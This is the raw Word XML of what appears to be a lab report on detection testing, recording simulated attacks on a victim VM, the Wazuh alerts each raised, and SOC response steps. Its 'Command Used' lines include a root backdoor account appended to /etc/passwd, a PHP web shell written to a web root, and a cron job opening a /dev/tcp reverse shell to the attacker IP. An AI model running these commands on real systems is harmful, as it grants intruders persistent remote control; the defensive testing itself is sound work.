              <w:t>Source IP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4B2A340C" w14:textId="6E5B5E0B" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r w:rsidRPr="008E4C2C">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00A235DE">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>92.168.0.159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( Debian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WSL )</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002117B2" w14:paraId="675CDC79" w14:textId="77777777" w:rsidTr="00450E6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4E4F474" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Destination IP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E82B4BF" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r w:rsidRPr="002117B2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.151 (Victim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002117B2" w14:paraId="55A5BBC7" w14:textId="77777777" w:rsidTr="00450E6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0830D08" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Expected Rule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E97EE81" w14:textId="3F1F2FAA" w:rsidR="002117B2" w:rsidRDefault="00F95C7E" w:rsidP="00450E65">
            <w:r w:rsidRPr="00F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>integrity check fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002117B2" w14:paraId="0188FB76" w14:textId="77777777" w:rsidTr="00450E6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221B74E" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Actual Alert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72820865" w14:textId="442223EC" w:rsidR="002117B2" w:rsidRDefault="00F95C7E" w:rsidP="00450E65">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sid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550 - </w:t>
            </w:r>
            <w:r w:rsidRPr="00F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Integrity checksum changed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002117B2" w14:paraId="6BFA45BB" w14:textId="77777777" w:rsidTr="00450E6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F239F93" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs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4ADD613" w14:textId="633C7B87" w:rsidR="002117B2" w:rsidRDefault="00F95C7E" w:rsidP="00450E65">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ossec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F95C7E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F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>syscheck</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F95C7E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F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>syscheck_entry_modified</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F95C7E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F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>syscheck_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002117B2" w14:paraId="09A40B00" w14:textId="77777777" w:rsidTr="00450E6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7B5204ED" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65"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493EAD1" w14:textId="51B7736F" w:rsidR="002117B2" w:rsidRDefault="00F95C7E" w:rsidP="00450E65">
            <w:r w:rsidRPr="00F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Suspicious/Warning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( level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7 )</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7546C5E1" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="002117B2">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3722427F" w14:textId="58FB6B28" w:rsidR="002117B2" w:rsidRDefault="00F95C7E" w:rsidP="002117B2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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sh root@192.168.1.151 'echo "malicious_user:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>x:0:0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>::/root:/bin/bash" &gt;&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385DE26C" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="002117B2">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended SOC Analyst Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC649B2" w14:textId="4F2E056F" w:rsidR="00F95C7E" w:rsidRPr="00F95C7E" w:rsidRDefault="00F95C7E" w:rsidP="00F95C7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the Modified File: Review the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> FIM alert details to determine exactly which critical file was altered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B062042" w14:textId="77777777" w:rsidR="00F95C7E" w:rsidRPr="00F95C7E" w:rsidRDefault="00F95C7E" w:rsidP="00F95C7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Isolate Endpoint: Temporarily disconnect the victim VM from the network to prevent further lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751061B5" w14:textId="77777777" w:rsidR="00F95C7E" w:rsidRPr="00F95C7E" w:rsidRDefault="00F95C7E" w:rsidP="00F95C7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Restore Integrity: Revert the unauthorized modification by restoring the affected file from a trusted backup or manually removing the injected code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C40C60" w14:textId="108165E0" w:rsidR="00F95C7E" w:rsidRPr="00F95C7E" w:rsidRDefault="00F95C7E" w:rsidP="00F95C7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Audit Access: Check /var/log/auth.log to see how the attacker successfully authenticated during the time of the modification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBED5B0" w14:textId="4244DCA9" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00F95C7E">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229DE14F" w14:textId="466FCE2F" w:rsidR="00F95C7E" w:rsidRDefault="006A4C56" w:rsidP="00F95C7E">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AE8609A" wp14:editId="1CDC280E">
            <wp:extent cx="6400800" cy="3137535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5555510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B195E" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616C1BF5" w14:textId="7CC8DFB5" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t>Test 6: Attack 6 — Web Shell Upload</w:t>
      </w:r>
    </w:p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2199"/>
        <w:gridCol w:w="7161"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A552D" w14:paraId="451C3073" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199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</w:tcPr>
          <w:p w14:paraId="0B79767A" w14:textId="77777777" w:rsidR="008A552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</w:tcPr>
          <w:p w14:paraId="4DC2CC15" w14:textId="77777777" w:rsidR="008A552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8A552D" w14:paraId="048F3DB9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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="657B780D" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attack Tool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CB9877A" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PowerShell Set-Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="45ED6236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63F92FD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Expected Rule/SID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4FF6B0E7" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Rule 554 — File added to the system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="55B6A362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EDD98B8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Actual Rule Fired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638A249" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>554</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="501A3EC3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AA6D0C6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Rule Level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4CA42487" w14:textId="77777777" w:rsidR="008A552D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</w:tr>
    </w:tbl>
    <w:p w14:paraId="19E69203" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7C4865" w14:textId="77777777" w:rsidR="008A552D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Set-Content -Path "C:\inetpub\wwwroot\shell.php" -Value '&lt;?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echo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shell_exec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($_GET["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"])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; ?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&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F21338" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended SOC Analyst Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D844F4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1. Immediately isolate the affected web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA16E9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2. Identify who/what created the file (check parent process).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ADD36A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3. Delete the web shell and scan for others in the web directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F948391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4. Review web server access logs for any requests to the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F882778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5. Check for lateral movement or persistence mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFBEFC5" w14:textId="3B2A4E34" w:rsidR="002117B2" w:rsidRDefault="00000000" w:rsidP="002117B2">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6ED835DD">
          <v:rect id="_x0000_s1027" style="position:absolute;left:0;text-align:left;margin-left:31.8pt;margin-top:189.9pt;width:351pt;height:9.3pt;z-index:251659264" filled="f" strokecolor="#a33e03 [3206]" strokeweight="1pt"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00634F7E">
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62CCC00C" wp14:editId="665566EF">
            <wp:extent cx="5582166" cy="3177540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1269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785" cy="3192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E86A5" w14:textId="1418ABEB" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="002117B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t>Test 7: Attack 7 — Malicious Cron Job Entry</w:t>
      </w:r>
    </w:p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2199"/>
        <w:gridCol w:w="7161"/>
      </w:tblGrid>
      <w:tr w:rsidR="002117B2" w14:paraId="3BCD7385" w14:textId="77777777" w:rsidTr="00450E65">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199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</w:tcPr>
          <w:p w14:paraId="4AC00BE8" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65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</w:tcPr>
          <w:p w14:paraId="4495A450" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65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2117B2" w14:paraId="6861D16E" w14:textId="77777777" w:rsidTr="00450E6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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="53D582B7" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attack Tool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10498AC" w14:textId="5DB31AAD" w:rsidR="002117B2" w:rsidRDefault="00F95C7E" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SSH / Bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002117B2" w14:paraId="52137A91" w14:textId="77777777" w:rsidTr="00450E6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BAC45BA" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Source IP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AFB9F19" w14:textId="25951281" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r w:rsidRPr="008E4C2C">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>92.168.0.159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( Debian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WSL )</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002117B2" w14:paraId="28CE8A25" w14:textId="77777777" w:rsidTr="00450E6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051E983" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Destination IP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1782273" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r w:rsidRPr="002117B2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.151 (Victim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002117B2" w14:paraId="4E702B5B" w14:textId="77777777" w:rsidTr="00450E6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696645E" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Expected Rule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2952319" w14:textId="7BF429A1" w:rsidR="002117B2" w:rsidRDefault="00F95C7E" w:rsidP="00450E65">
            <w:r w:rsidRPr="00F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Suspicious </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> entry detected / FIM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F95C7E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002117B2" w14:paraId="42DA4842" w14:textId="77777777" w:rsidTr="00450E6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403C2184" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Actual Alert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DDEAE87" w14:textId="6F632A91" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sid:</w:t>
            </w:r>
            <w:r w:rsidR="00FE45BE">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2832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 w:rsidR="00FE45BE" w:rsidRPr="00FE45BE">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Crontab entry changed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002117B2" w14:paraId="0BC84AEC" w14:textId="77777777" w:rsidTr="00450E6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B12F64D" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs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17FB826" w14:textId="474B2357" w:rsidR="002117B2" w:rsidRDefault="00FE45BE" w:rsidP="00450E65">
            <w:r w:rsidRPr="00FE45BE">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">syslog, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FE45BE">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002117B2" w14:paraId="3B8FB2E9" w14:textId="77777777" w:rsidTr="00450E6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DEEED4B" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65"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72121A81" w14:textId="6DC921F8" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="00450E65">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium (Level </w:t>
            </w:r>
            <w:r w:rsidR="00FE45BE">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5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</w:tbl>
    <w:p w14:paraId="12CF6BCA" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="002117B2">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A66E160" w14:textId="141756DC" w:rsidR="002117B2" w:rsidRDefault="00F95C7E" w:rsidP="002117B2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ssh root@192.168.1.151 '(crontab -l 2&gt;/dev/null; echo "* * * * * /bin/bash -c '\''bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F95C7E"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 w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F95C7E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/192.168.0.159/4444 0&gt;&amp;1'\''") | crontab -'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E0F42C" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2" w:rsidP="002117B2">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended SOC Analyst Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1125AE78" w14:textId="757C9547" w:rsidR="006A4C56" w:rsidRPr="006A4C56" w:rsidRDefault="006A4C56" w:rsidP="006A4C56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
